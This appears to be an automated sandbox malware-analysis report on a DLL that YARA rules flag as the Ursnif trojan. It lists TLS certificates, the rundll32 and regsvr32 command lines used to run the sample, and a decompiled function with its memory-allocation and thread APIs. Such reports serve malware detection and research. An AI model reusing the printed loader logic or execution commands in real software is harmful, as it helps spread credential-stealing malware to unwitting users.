                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:48.572957039 CEST104.20.184.68443192.168.2.349702CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:48.573554039 CEST104.20.184.68443192.168.2.349703CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.841680050 CEST151.101.1.44443192.168.2.349714CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                            CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.845676899 CEST151.101.1.44443192.168.2.349715CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                            CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.946127892 CEST151.101.1.44443192.168.2.349716CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                            CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.949470997 CEST151.101.1.44443192.168.2.349717CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                            CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.951731920 CEST151.101.1.44443192.168.2.349718CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                            CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.952430010 CEST151.101.1.44443192.168.2.349719CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                            CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030

                                                                                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Start time:18:03:36
                                                                                                                                                                                                                                                            Start date:03/06/2021
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:loaddll32.exe 'C:\Users\user\Desktop\racial.dll'
                                                                                                                                                                                                                                                            Imagebase:0xbf0000
                                                                                                                                                                                                                                                            File size:116736 bytes
                                                                                                                                                                                                                                                            MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.424668518.00000000005E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Start time:18:03:36
                                                                                                                                                                                                                                                            Start date:03/06/2021
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                                                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Start time:18:03:37
                                                                                                                                                                                                                                                            Start date:03/06/2021
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:regsvr32.exe /s C:\Users\user\Desktop\racial.dll
                                                                                                                                                                                                                                                            Imagebase:0x1030000
                                                                                                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.409632514.00000000030B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Start time:18:03:37
                                                                                                                                                                                                                                                            Start date:03/06/2021
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                                                                                                                                                                                                                                                            Imagebase:0xc10000
                                                                                                                                                                                                                                                            File size:61952 bytes
                                                                                                                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.414055560.0000000002D70000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.473399116.0000000005658000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Start time:18:03:37
                                                                                                                                                                                                                                                            Start date:03/06/2021
                                                                                                                                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            Imagebase:0x7ff668540000
                                                                                                                                                                                                                                                            File size:823560 bytes
                                                                                                                                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Start time:18:03:38
                                                                                                                                                                                                                                                            Start date:03/06/2021
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:rundll32.exe C:\Users\user\Desktop\racial.dll,DllRegisterServer
                                                                                                                                                                                                                                                            Imagebase:0xc10000
                                                                                                                                                                                                                                                            File size:61952 bytes
                                                                                                                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.421428339.0000000003120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Start time:18:03:39
                                                                                                                                                                                                                                                            Start date:03/06/2021
                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2212 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                                                                            Imagebase:0x1200000
                                                                                                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Start time:18:05:38
                                                                                                                                                                                                                                                            Start date:03/06/2021
                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2212 CREDAT:17426 /prefetch:2
                                                                                                                                                                                                                                                            Imagebase:0x1200000
                                                                                                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                                                                                                                              			E6E2017A7(intOrPtr _a4) {
                                                                                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                                                                                              				struct _SYSTEMTIME _v44;
                                                                                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                                                                                              				long _v52;
                                                                                                                                                                                                                                                              				long _v56;
                                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                                              				long _t21;
                                                                                                                                                                                                                                                              				int _t23;
                                                                                                                                                                                                                                                              				long _t26;
                                                                                                                                                                                                                                                              				long _t27;
                                                                                                                                                                                                                                                              				long _t31;
                                                                                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                                                                                              				intOrPtr _t44;
                                                                                                                                                                                                                                                              				signed int _t45;
                                                                                                                                                                                                                                                              				void* _t50;
                                                                                                                                                                                                                                                              				signed int _t54;
                                                                                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                                                                                              				intOrPtr* _t57;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t21 = E6E20146C();
                                                                                                                                                                                                                                                              				_v52 = _t21;
                                                                                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                                                                                              					L18:
                                                                                                                                                                                                                                                              					return _t21;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					goto L1;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                                              					L1:
                                                                                                                                                                                                                                                              					GetSystemTime( &_v44);
                                                                                                                                                                                                                                                              					_t23 = SwitchToThread();
                                                                                                                                                                                                                                                              					asm("cdq");
                                                                                                                                                                                                                                                              					_t45 = 9;
                                                                                                                                                                                                                                                              					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                                                                                                                                                                                                                                              					_t26 = E6E2015A3(0, _t54); // executed
                                                                                                                                                                                                                                                              					_v56 = _t26;
                                                                                                                                                                                                                                                              					Sleep(_t54 << 5); // executed
                                                                                                                                                                                                                                                              					_t21 = _v56;
                                                                                                                                                                                                                                                              				} while (_t21 == 0xc);
                                                                                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                                                                                              					goto L18;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t27 = E6E201C12(_t45); // executed
                                                                                                                                                                                                                                                              				_v52 = _t27;
                                                                                                                                                                                                                                                              				if(_t27 != 0) {
                                                                                                                                                                                                                                                              					L16:
                                                                                                                                                                                                                                                              					_t21 = _v52;
                                                                                                                                                                                                                                                              					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                              						_t21 = GetLastError();
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					goto L18;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                                              					_t56 = E6E201CA4(E6E2016EC,  &_v28);
                                                                                                                                                                                                                                                              					if(_t56 == 0) {
                                                                                                                                                                                                                                                              						_v56 = GetLastError();
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                                                                                                                                                                                                                                                              						_v56 = _t31;
                                                                                                                                                                                                                                                              						if(_t31 == 0) {
                                                                                                                                                                                                                                                              							GetExitCodeThread(_t56,  &_v56);
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						CloseHandle(_t56);
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					goto L16;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				if(E6E201D7C(_t45,  &_v48) != 0) {
                                                                                                                                                                                                                                                              					 *0x6e2041b8 = 0;
                                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t44 = _v48;
                                                                                                                                                                                                                                                              				_t57 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                                              				_t37 =  *_t57(_t44, 0, 0); // executed
                                                                                                                                                                                                                                                              				_t50 = _t37;
                                                                                                                                                                                                                                                              				if(_t50 == 0) {
                                                                                                                                                                                                                                                              					L9:
                                                                                                                                                                                                                                                              					 *0x6e2041b8 = _t44;
                                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t15 = _t50 + 2; // 0x2
                                                                                                                                                                                                                                                              				_t39 = E6E201C8F(_t50 + _t15);
                                                                                                                                                                                                                                                              				 *0x6e2041b8 = _t39;
                                                                                                                                                                                                                                                              				if(_t39 == 0) {
                                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					 *_t57(_t44, _t39, _t50); // executed
                                                                                                                                                                                                                                                              					E6E20136A(_t44);
                                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              			}






















                                                                                                                                                                                                                                                              0x6e2017b3
                                                                                                                                                                                                                                                              0x6e2017bc
                                                                                                                                                                                                                                                              0x6e2017c0
                                                                                                                                                                                                                                                              0x6e2018c8
                                                                                                                                                                                                                                                              0x6e2018ce
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2017c6
                                                                                                                                                                                                                                                              0x6e2017c6
                                                                                                                                                                                                                                                              0x6e2017cb
                                                                                                                                                                                                                                                              0x6e2017d1
                                                                                                                                                                                                                                                              0x6e2017e0
                                                                                                                                                                                                                                                              0x6e2017e1
                                                                                                                                                                                                                                                              0x6e2017e4
                                                                                                                                                                                                                                                              0x6e2017e7
                                                                                                                                                                                                                                                              0x6e2017f0
                                                                                                                                                                                                                                                              0x6e2017f4
                                                                                                                                                                                                                                                              0x6e2017fa
                                                                                                                                                                                                                                                              0x6e2017fe
                                                                                                                                                                                                                                                              0x6e201805
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e20180b
                                                                                                                                                                                                                                                              0x6e201812
                                                                                                                                                                                                                                                              0x6e201816
                                                                                                                                                                                                                                                              0x6e2018b9
                                                                                                                                                                                                                                                              0x6e2018b9
                                                                                                                                                                                                                                                              0x6e2018c0
                                                                                                                                                                                                                                                              0x6e2018c2
                                                                                                                                                                                                                                                              0x6e2018c2
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2018c0
                                                                                                                                                                                                                                                              0x6e20181f
                                                                                                                                                                                                                                                              0x6e201872
                                                                                                                                                                                                                                                              0x6e201872
                                                                                                                                                                                                                                                              0x6e201883
                                                                                                                                                                                                                                                              0x6e201887
                                                                                                                                                                                                                                                              0x6e2018b5
                                                                                                                                                                                                                                                              0x6e201889
                                                                                                                                                                                                                                                              0x6e20188c
                                                                                                                                                                                                                                                              0x6e201894
                                                                                                                                                                                                                                                              0x6e201898
                                                                                                                                                                                                                                                              0x6e2018a0
                                                                                                                                                                                                                                                              0x6e2018a0
                                                                                                                                                                                                                                                              0x6e2018a7
                                                                                                                                                                                                                                                              0x6e2018a7
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201887
                                                                                                                                                                                                                                                              0x6e20182d
                                                                                                                                                                                                                                                              0x6e20186c
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e20186c
                                                                                                                                                                                                                                                              0x6e20182f
                                                                                                                                                                                                                                                              0x6e201833
                                                                                                                                                                                                                                                              0x6e20183c
                                                                                                                                                                                                                                                              0x6e20183e
                                                                                                                                                                                                                                                              0x6e201842
                                                                                                                                                                                                                                                              0x6e201864
                                                                                                                                                                                                                                                              0x6e201864
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201864
                                                                                                                                                                                                                                                              0x6e201844
                                                                                                                                                                                                                                                              0x6e201849
                                                                                                                                                                                                                                                              0x6e201850
                                                                                                                                                                                                                                                              0x6e201855
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201857
                                                                                                                                                                                                                                                              0x6e20185a
                                                                                                                                                                                                                                                              0x6e20185d
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e20185d

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E20146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E2017B8,74B063F0,00000000), ref: 6E20147B
                                                                                                                                                                                                                                                                • Part of subcall function 6E20146C: GetVersion.KERNEL32 ref: 6E20148A
                                                                                                                                                                                                                                                                • Part of subcall function 6E20146C: GetCurrentProcessId.KERNEL32 ref: 6E201499
                                                                                                                                                                                                                                                                • Part of subcall function 6E20146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E2014B2
                                                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 6E2017CB
                                                                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 6E2017D1
                                                                                                                                                                                                                                                                • Part of subcall function 6E2015A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E2015F9
                                                                                                                                                                                                                                                                • Part of subcall function 6E2015A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E2017EC), ref: 6E20168B
                                                                                                                                                                                                                                                                • Part of subcall function 6E2015A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E2016A6
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000000,00000000), ref: 6E2017F4
                                                                                                                                                                                                                                                              • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E20183C
                                                                                                                                                                                                                                                              • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E20185A
                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,6E2016EC,?,00000000), ref: 6E20188C
                                                                                                                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E2018A0
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6E2018A7
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(6E2016EC,?,00000000), ref: 6E2018AF
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6E2018C2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2280543912-0
                                                                                                                                                                                                                                                              • Opcode ID: b506397c79bbf89a0cdcedb505f99895aae3a702b921f87fab97e550b1841a5b
                                                                                                                                                                                                                                                              • Instruction ID: 4e5c29af83dd035778fb99b17fb11bcb41987480e870181db912d6594c354842
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b506397c79bbf89a0cdcedb505f99895aae3a702b921f87fab97e550b1841a5b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D31827180571A9BE750DFA5888CD5B77FFFE86759B100A1AF560C21C0E770C688C6B2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,0000079C,00003000,00000040,0000079C,6E281E18), ref: 6E282480
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,6E281E7C), ref: 6E2824B7
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00013F51,00003000,00000040), ref: 6E282517
                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E28254D
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(6E200000,00000000,00000004,6E2823A2), ref: 6E282652
